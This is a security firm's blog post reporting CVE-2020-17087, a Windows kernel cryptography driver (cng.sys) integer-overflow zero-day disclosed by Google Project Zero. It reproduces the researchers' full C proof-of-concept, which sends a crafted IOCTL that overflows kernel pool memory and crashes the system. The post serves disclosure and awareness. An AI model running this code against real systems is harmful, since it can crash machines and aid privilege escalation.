---
title: CVE-2020-17087 – Windows Kernel local privilege escalation 0day
description: "Security researchers from Google Project Zero team has disclosed a zero-day vulnerability in Windows OS and that it is currently being exploited in the wild. Credited: Mateusz Jurczyk and Sergei Glazunov of Google Project Zero The Windows Kernel Cryptography Driver (cng.sys) exposes a \\Device\\CNG device to user-mode programs and supports a variety of IOCTLs with […]"
---

[Skip to content](https://blog.scsprotect.com/cve-2020-17087-windows-kernel-local-privilege-escalation-0day#main-content)

[![SCS Logo](https://blog.scsprotect.com/hs-fs/hubfs/logo-1-300x92.png?width=300&height=92&name=logo-1-300x92.png "SCS Logo")](https://scsprotect.com/)

[708-593-3516](tel:708-593-3516)

Search

- There are no suggestions because the search field is empty.

- [Cyberthreats](https://scsprotect.com/cyberthreats/)
- [Services](https://scsprotect.com/services/)
  
  Show submenu for Services 
  
    - [Overview](https://scsprotect.com/services/)
    - [Cybersecurity Engagements](https://scsprotect.com/services/cybersecurity-engagements/)
    - [Governance & Compliance](https://scsprotect.com/services/governance-and-compliance/)
    - [Managed Security](https://scsprotect.com/services/managed-security/)
    - [IT Support](https://scsprotect.com/services/it-support/)
- [Partners](https://scsprotect.com/partners/)
- [About](https://scsprotect.com/about/)
- [Contact](https://scsprotect.com/contact/)
- [Blog](https://blog.scsprotect.com)

- [Cyberthreats](https://scsprotect.com/cyberthreats/)
- [Services](https://scsprotect.com/services/)
  
  Show submenu for Services 
  
    - [Overview](https://scsprotect.com/services/)
    - [Cybersecurity Engagements](https://scsprotect.com/services/cybersecurity-engagements/)
    - [Governance & Compliance](https://scsprotect.com/services/governance-and-compliance/)
    - [Managed Security](https://scsprotect.com/services/managed-security/)
    - [IT Support](https://scsprotect.com/services/it-support/)
- [Partners](https://scsprotect.com/partners/)
- [About](https://scsprotect.com/about/)
- [Contact](https://scsprotect.com/contact/)
- [Blog](https://blog.scsprotect.com)

## CVE-2020-17087 – Windows Kernel local privilege escalation 0day

[by Admin](https://blog.scsprotect.com/author/admin)  October 31, 2020

Security researchers from Google Project Zero team has disclosed a zero-day vulnerability in Windows OS and that it is currently being exploited in the wild.

**Credited**: Mateusz Jurczyk and Sergei Glazunov of Google Project Zero

> The Windows Kernel Cryptography Driver (cng.sys) exposes a \\Device\\CNG device to user-mode programs and supports a variety of IOCTLs with non-trivial input structures. It constitutes a locally accessible attack surface that can be exploited for privilege escalation,” **Mateusz Jurczyk**

The details about the bug were first reported on a Google [discussion board](https://t.co/bO451188Mk?amp=1) on October 22. And due to the flaw being exploited in the wild, the information was then made public after seven days, per Google’s policy (for bugs that are not targeted, vendors are given 90 days to patch).

Project Zero’s lead Ben Hawkes recently said in a tweet that Microsoft plans to issue a patch on November 10.

Microsoft has not confirmed this date as of yet.

> Currently we expect a patch for this issue to be available on November 10. We have confirmed with the Director of Google's Threat Analysis Group, Shane Huntley ([@ShaneHuntley](https://twitter.com/ShaneHuntley?ref_src=twsrc%5Etfw)), that this is targeted exploitation and this is not related to any US election related targeting.
> 
>  — Ben Hawkes (@benhawkes) [October 30, 2020](https://twitter.com/benhawkes/status/1322206829296844800?ref_src=twsrc%5Etfw)

 

> “The integer overflow occurs in line 2, and if SourceLength is equal to or greater than 0x2AAB, an inadequately small buffer is allocated from the NonPagedPool in line 3. It is subsequently overflown by the binary-to-hex conversion loop in lines 5-10 by a multiple of 65536 bytes.
> 
> The source code of a proof-of-concept program is attached. It was tested on an up-to-date build of Windows 10 1903 (64-bit), but the vulnerability is believed to be present since at least Windows 7. A crash is easiest to reproduce with Special Pools enabled for cng.sys, but even in the default configuration the corruption of 64kB of kernel data will almost surely crash the system shortly after running the exploit.”
> 
> **Mateusz Jurczyk**

 

**Proof of Concept was included in [Google post](https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=472684):**

```
#pragma comment(lib, "ntdll")

#include <cstdio>
#include <windows.h>

int main() {
  HANDLE hCng = CreateFileA("\\\\.\\GLOBALROOT\\Device\\Cng",
    GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

  if (hCng == NULL) {
    printf("[-] Failed to open \\Device\\Cng: %u\n", GetLastError());
    return 1;
  }

  printf("[+] \\Device\\Cng opened, handle: %p\n", hCng);

  //
  // DataBufferSize overflows when used for allocating memory in
  // cng!CfgAdtpFormatPropertyBlock as (uint16)(DataBufferSize * 6).
  //
  // In this proof-of-concept, an allocation of (uint16)(0x2AAB * 6) = 2
  // bytes is requested while 0x2AAB * 6 = 0x10002 bytes are written to it.
  //
  CONST DWORD DataBufferSize = 0x2AAB;
  CONST DWORD IoctlSize = 4096 + DataBufferSize;
  BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);

  RtlZeroMemory(IoctlData, IoctlSize);

  *(DWORD*)    &IoctlData[0x00] = 0x1A2B3C4D;
  *(DWORD*)    &IoctlData[0x04] = 0x10400;
  *(DWORD*)    &IoctlData[0x08] = 1;
  *(ULONGLONG*)&IoctlData[0x10] = 0x100;
  *(DWORD*)    &IoctlData[0x18] = 3;
  *(ULONGLONG*)&IoctlData[0x20] = 0x200;
  *(ULONGLONG*)&IoctlData[0x28] = 0x300;
  *(ULONGLONG*)&IoctlData[0x30] = 0x400;
  *(DWORD*)    &IoctlData[0x38] = 0;
  *(ULONGLONG*)&IoctlData[0x40] = 0x500;
  *(ULONGLONG*)&IoctlData[0x48] = 0x600;
  *(DWORD*)    &IoctlData[0x50] = DataBufferSize; // OVERFLOW
  *(ULONGLONG*)&IoctlData[0x58] = 0x1000;
  *(ULONGLONG*)&IoctlData[0x60] = 0;
  RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
  RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);

  ULONG_PTR OutputBuffer = 0;
  DWORD BytesReturned;
  BOOL Status = DeviceIoControl(
    hCng,
    0x390400,
    IoctlData,
    IoctlSize,
    &OutputBuffer,
    sizeof(OutputBuffer),
    &BytesReturned,
    NULL
  );

  printf("[+] Ioctl sent, Status: %d, OutputBuffer: %zx\n", Status, OutputBuffer);

  HeapFree(GetProcessHeap(), 0, IoctlData);
  CloseHandle(hCng);

  return 0;
}
```

This is a search field with an auto-suggest feature attached.

- There are no suggestions because the search field is empty.

### Recent Posts

### Categories

[Research](https://blog.scsprotect.com/tag/research) [Vulnerability](https://blog.scsprotect.com/tag/vulnerability)

### Posts by Month

- [October 2025 (1)](https://blog.scsprotect.com/archive/2025/10)
- [June 2025 (2)](https://blog.scsprotect.com/archive/2025/06)
- [April 2025 (2)](https://blog.scsprotect.com/archive/2025/04)
- [March 2025 (1)](https://blog.scsprotect.com/archive/2025/03)
- [February 2025 (1)](https://blog.scsprotect.com/archive/2025/02)
- [January 2025 (1)](https://blog.scsprotect.com/archive/2025/01)
- [November 2024 (1)](https://blog.scsprotect.com/archive/2024/11)
- [October 2024 (1)](https://blog.scsprotect.com/archive/2024/10)
- [August 2024 (1)](https://blog.scsprotect.com/archive/2024/08)
- [June 2024 (1)](https://blog.scsprotect.com/archive/2024/06)
- [April 2024 (2)](https://blog.scsprotect.com/archive/2024/04)
- [February 2024 (1)](https://blog.scsprotect.com/archive/2024/02)
- [October 2023 (1)](https://blog.scsprotect.com/archive/2023/10)
- [February 2023 (1)](https://blog.scsprotect.com/archive/2023/02)
- [November 2021 (2)](https://blog.scsprotect.com/archive/2021/11)
- [October 2021 (1)](https://blog.scsprotect.com/archive/2021/10)
- [December 2020 (2)](https://blog.scsprotect.com/archive/2020/12)
- [November 2020 (2)](https://blog.scsprotect.com/archive/2020/11)
- [October 2020 (4)](https://blog.scsprotect.com/archive/2020/10)
- [September 2020 (1)](https://blog.scsprotect.com/archive/2020/09)
- [August 2020 (1)](https://blog.scsprotect.com/archive/2020/08)
- [July 2020 (1)](https://blog.scsprotect.com/archive/2020/07)
- [June 2020 (1)](https://blog.scsprotect.com/archive/2020/06)
- [May 2020 (1)](https://blog.scsprotect.com/archive/2020/05)
- [April 2018 (1)](https://blog.scsprotect.com/archive/2018/04)
- [March 2018 (5)](https://blog.scsprotect.com/archive/2018/03)
- [February 2018 (3)](https://blog.scsprotect.com/archive/2018/02)
- [January 2018 (5)](https://blog.scsprotect.com/archive/2018/01)
- [December 2017 (3)](https://blog.scsprotect.com/archive/2017/12)
- [November 2017 (3)](https://blog.scsprotect.com/archive/2017/11)
- [October 2017 (6)](https://blog.scsprotect.com/archive/2017/10)
- [May 2017 (1)](https://blog.scsprotect.com/archive/2017/05)
- [January 2016 (3)](https://blog.scsprotect.com/archive/2016/01)
- [November 2015 (1)](https://blog.scsprotect.com/archive/2015/11)
- [October 2015 (1)](https://blog.scsprotect.com/archive/2015/10)

see all

## Read On

### [GlueBall Vulnerability (CV-2020-1464)](https://blog.scsprotect.com/glueball-vulnerability-cv-2020-1464)

Microsoft finally patched a zero-day that has existed for years named “GlueBall” (CV-2020-1464:...

### [Meltdown and Spectre: What We Know](https://blog.scsprotect.com/meltdown-and-spectre-what-we-know)

Last Wednesday, researchers from Google’s Project Zero and various universities released two...

### [Telegram Zero-Day Used to Mine Crypto](https://blog.scsprotect.com/telegram-zero-day-used-to-mine-crypto)

Kaspersky Labs revealed today that a previously-unknown attack on the popular messaging app...

[![SCS Logo](https://blog.scsprotect.com/hs-fs/hubfs/logo-1-300x92.png?width=300&height=92&name=logo-1-300x92.png "SCS Logo")](https://scsprotect.com/)

### © Copyright 2024 SCS

[TERMS & CONDITIONS](https://scsprotect.com/termsandconditions/) [PRIVACY POLICY](https://scsprotect.com/privacypolicy/)

- [Cyberthreats](https://scsprotect.com/cyberthreats/)
- [Services](https://scsprotect.com/services/)
- [Partners](https://scsprotect.com/partners/)
- [About](https://scsprotect.com/about/)
- [Contact](https://scsprotect.com/contact/)
- [Blog](https://blog.scsprotect.com)

[708-593-3516](tel:708-593-3516)

[Follow us on Twitter](https://twitter.com/SecCompSol) [Follow us on Facebook](https://www.facebook.com/SecureComplianceSolutions) [Follow us on Facebook](https://github.com/Secure-Compliance-Solutions-LLC) [Follow us on LinkedIn](https://www.linkedin.com/authwall?trk=bf&trkInfo=AQGwIqLZLJ6-iwAAAYtsHqqYSjD2Uqv1U_cM0b0djtojM7EUQm9GGXH7fhtuHHmmlyWJJmhQ37JCuRdAjRdXPVOl9FdDVKqOwdqHFc24h_-3zZX1baMyqNlXtLKIKEaU_HG3aa4=&original_referer=&sessionRedirect=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fsecure-compliance-solutions-llc%2Fabout%2F)

```json
{
  "@context" : "https://schema.org",
  "@type" : "BlogPosting",
  "author" : {
    "@type" : "Person",
    "name" : "Admin",
    "url" : "https://blog.scsprotect.com/author/admin"
  },
  "dateModified" : "2023-10-30T19:38:25.272Z",
  "datePublished" : "2020-10-31T18:56:00.000Z",
  "headline" : "CVE-2020-17087 – Windows Kernel local privilege escalation 0day",
  "mainEntityOfPage" : {
    "@id" : "https://blog.scsprotect.com/cve-2020-17087-windows-kernel-local-privilege-escalation-0day",
    "@type" : "WebPage"
  },
  "publisher" : {
    "@type" : "Organization",
    "logo" : {
      "@type" : "ImageObject",
      "url" : "https://blog.scsprotect.com/hubfs/logo-1-300x92.png"
    },
    "name" : "Secure Compliance Solutions"
  }
}
```